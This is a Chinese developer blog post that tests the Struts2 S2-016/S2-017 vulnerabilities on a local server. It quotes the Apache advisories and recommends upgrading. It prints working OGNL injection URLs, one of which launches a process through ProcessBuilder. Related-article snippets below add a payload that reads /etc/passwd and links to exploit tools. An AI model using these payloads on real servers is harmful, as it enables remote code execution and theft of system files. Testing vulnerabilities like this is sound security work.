Struts2漏洞S2-016和S2-017

最新推荐文章于 2019-04-26 13:56:37 发布
最新推荐文章于 2019-04-26 13:56:37 发布
阅读量1.8k 收藏
点赞数
分类专栏: Struts2 文章标签: Struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010743716/article/details/9385187
版权

昨天出的struts2的漏洞,我只是瓢了一眼,今天有空正好试一下

下面是官网的两个漏洞的说明

http://struts.apache.org/release/2.3.x/docs/s2-016.html

problem:

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.


http://struts.apache.org/release/2.3.x/docs/s2-017.html

problem:

The Struts 2 DefaultActionMapper used to support a method for short-circuit navigation state changes by prefixing parameters with "redirect:" or "redirectAction:", followed by a desired redirect target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following "redirect:" or "redirectAction:" can easily be manipulated to redirect to an arbitrary location.


官网给出了poc


截图吧!








下面是我试的:

http://localhost:8080/example/index.action?redirect:%25{3*4}


看到3*4被执行了


http://localhost:8080/example/index.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'calc','goes','here'})).start()}


看到了撒....

要升级到struts2 2.3.15.1



null_sz
关注
专栏目录
S2-016/017漏洞工具 struts漏洞
02-26
本工具可以详细测试S2-016/017漏洞的资源,有助于您更深层的了解struts!
struts2反序列化漏洞,存在s2-005、s2-016s2-016_3、s2-017
08-28
然而,这个框架的历史上存在一系列的安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...
修复漏洞--Struts2远程命令执行S2-016/S2-017
qq_38281963的博客
11-28 2471
问题描述:该问题是由于Struts2框架,主要是2.2之前版本漏洞所造成的,漏洞会引起数据泄露和容易被黑客攻击。 解决思路1:可以对现有工程进行maven版本更新,升级到2.3,但是版本升级一般费时费力 解决思路2:下载当前工程使用的Struts2版本源码,修改DefaultActionMapper中handleSpecialParameters方法 因为本项目版本依赖复杂,版本升级难度较大...
struts2中的跳转详解 ----“请求转发”和“重定向”之间的区别
yonglongwang的专栏
04-14 2610
Struts2的ResultType和Action处理链  Struts2的结果类型 在struts-default.xml中定义了Struts2内置的所有可用的 所有的Struts2结果处理类都要直接或间接的实现com.opensymphony.xwork2.Result接口 在struts-default.xml中的里面,有这样一行声明 Deprecated name form
Struts2 高危漏洞修复方案 (S2-016/S2-017)
傾城如夢的专栏
08-27 136
建忠 闫. 于 星期四, 08/08/2013 - 08:09 提交 近期Struts2被曝重要漏洞,此漏洞影响struts2.0-struts2.3所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大,受影响站点以电商、银行、门户、政府居多. 官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S...
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
crystal0011的专栏
08-20 2419
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本 Struts2这个不争气的家伙。已经无话可说了。  POC来自官方: http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-0
struts2 最新漏洞 S2-016S2-017修补方案 .docx
08-01
Struts2S2-016S2-017 漏洞的修补需要对 Struts2 的源代码和配置文件进行修改,以防止攻击者 inject 恶意代码。需要小心地操作,以免出现错误。同时,需要注意的是,这两个漏洞的修补需要对 Struts2 的源代码...
Struts2_s2-016&017&ognl2.6.11_patch漏洞补丁
07-25
-- 为修复struts2 s2-016s2-017漏洞,重写DefaultActionMapper --> <bean type="org.apache.struts2.dispatcher.mapper.ActionMapper" name="myDefaultActionMapper" class=...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
S2-045 漏洞是一个严重的安全漏洞,影响 Struts2 的多个版本,包括 2.3.5-2.3.31 和 2.5-2.5.102。该漏洞是由于 Struts2 中的 MultiPartRequestWrapper 类中的一个错误导致的,该错误可能会导致攻击者可以上传恶意...
Struts2 (S2-016/S2-017)高危漏洞修复文件
最新发布
04-06
然而,像任何其他软件一样,Struts2也存在安全漏洞,其中S2-016S2-017是两个知名的高危漏洞S2-016漏洞,全称为"Struts2 REST插件远程代码执行漏洞",主要影响Struts2的REST插件。该漏洞源于框架在处理XML内容...
S2-016漏洞利用工具
05-03
S2-016的检测和利用
Struts2简单的页面跳转示例
11-19
初学Struts2,写了一个简单的用struts2实现页面跳转的功能。高手勿喷
2016最新struts2漏洞利用工具无后门版(K8 Struts2 Exploit)
03-05
K8 Struts2 Exploit神器唯一无后门的版本,可自行杀毒检验
Struts s2-016 s2-017 补丁
09-27
对Struts s2-016 s2-017的官方修复建议是升级struts, 但对正在运行的系统,许多依赖包会导致运行出错, 直接更改代码是更快的选择. 本补丁是针对 struts2-core-2.0.11.jar 的修改, 把文件中 bin下的文件直接copy到 web-inf/classes下, 重启web server, 就可解决问题(代码修改采用 jason.zhou 的方案, 做了一点改动), 源码在压缩文件的src目录下
怎么解决Struts2 URL跳转S2-017 的问题
weixin_42638610的博客
04-26 1317
出现的问题:在访问网站的路径后面加上?redirect:http://www.anonymous.com/ 可以直接通过网址重定向到指定的网站 解决的办法: 创建一个实体类继承DefaultActionMapper 来重写里面的一些方法 import org.apache.struts2.dispatcher.mapper.ActionMapping; import or...
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本及修复方法
weixin_30519071的博客
07-18 308
详情查看http://zone.wooyun.org/content/5159 官方漏洞说明 http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html 修复方法: 找到站点目录下面lib目录 删掉 struts2-s...
Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理
收集盒 Book box
07-31 3406
以下是Struts2 S2-016/S2-017漏洞 命令执行整理 带回显命令执行 http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复
热门推荐
yx9o
03-26 1万+
Struts2 S2-016,S2-017远程代码执行漏洞解决,修复 官网描述如下: http://struts.apache.org/release/2.3.x/docs/s2-016.html 怎么解决呢?
Struts2高危漏洞补丁:S2-016/S2-017紧急修复文件
S2-016S2-017是两个特别著名的高危漏洞,它们被归类为远程代码执行(RCE)漏洞,意味着攻击者可以远程执行任意代码,从而完全控制运行Struts2框架的服务器。 S2-016漏洞(CVE-2013-2251)于2013年被发现,它是由...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值